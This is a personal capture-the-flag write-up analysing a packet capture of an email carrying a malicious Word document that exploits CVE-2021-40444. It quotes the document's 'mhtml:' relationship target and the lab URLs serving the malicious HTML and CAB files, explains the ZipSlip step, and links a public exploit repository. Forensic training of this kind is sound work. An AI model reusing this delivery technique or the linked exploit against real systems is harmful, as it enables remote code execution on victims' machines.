I joined this ctf in progress. As a result, I was tasked with the second half of the flags. In my opinon this was the more fun side to the ctf - but maybe my love of Wireshark has biased me.

15. What is the MD5 hash of the email attachment?

Using the filter tcp.port == 25 or icmp to only display email traffic: Following the TCP traffic of one of the “Data fragment” packet gives the email: Then, using CyberChef - I decoded from Base64 and MD5’ed the output:

16. What is the CVE number the attacker tried to exploit using the malicious document?

Using CyberChef’s save option - I saved the file as web_server.docx and uploaded it to VirtusTotal to get the CVE. CVE-2021-40444

17. The malicious document file contains a URL to a malicious HTML file. Provide the URL for this file.

.docx - and many Office-style documents - are just zipped folders. So I just unzipped the folder and ran a recursize grep for “.html”:

$ unzip web_server.docx
$ grep -R "\.html"
...
Target="mhtml:http://192.168.112.128/word.html!x-usc:http://192.168.112.128/word.html"
...

The URL is http://192.168.112.128/word.html

18 What is the LinkType of the OLEObject related to the relationship which contains the malicious URL?

Another grep, this time for “LinkType”:

$ grep -R "LinkType"
...
<o:LinkType>EnhancedMetaFile</o:LinkType>
...

20. The malicious HTML contains a js code that points to a malicious CAB file. Provide the URL to the CAB file?

Using the IP I found from question 17, applying the WireShark filter: ip.dst == 192.168.112.128, I easily found the URL:

http://192.168.112.128/word.cab

21. The exploit takes advantage of a CAB vulnerability. Provide the vulnerability name?

Using WireShark’s Export Object, I found word.cab and exported it:

Running it through VirusTotal:

One of the Virus total results was Exploit.CVE-2021-40444.Gen.2. After searchig for it, I was able to find a working exploit using CAB: https://github.com/klezVirus/CVE-2021-40444

Step six of the exploit chain stated:

  1. Due to a Path traversal (ZipSlip) vulnerability in the CAB, it’s possible to store the INF in %TEMP%

So the answer is ZipSlip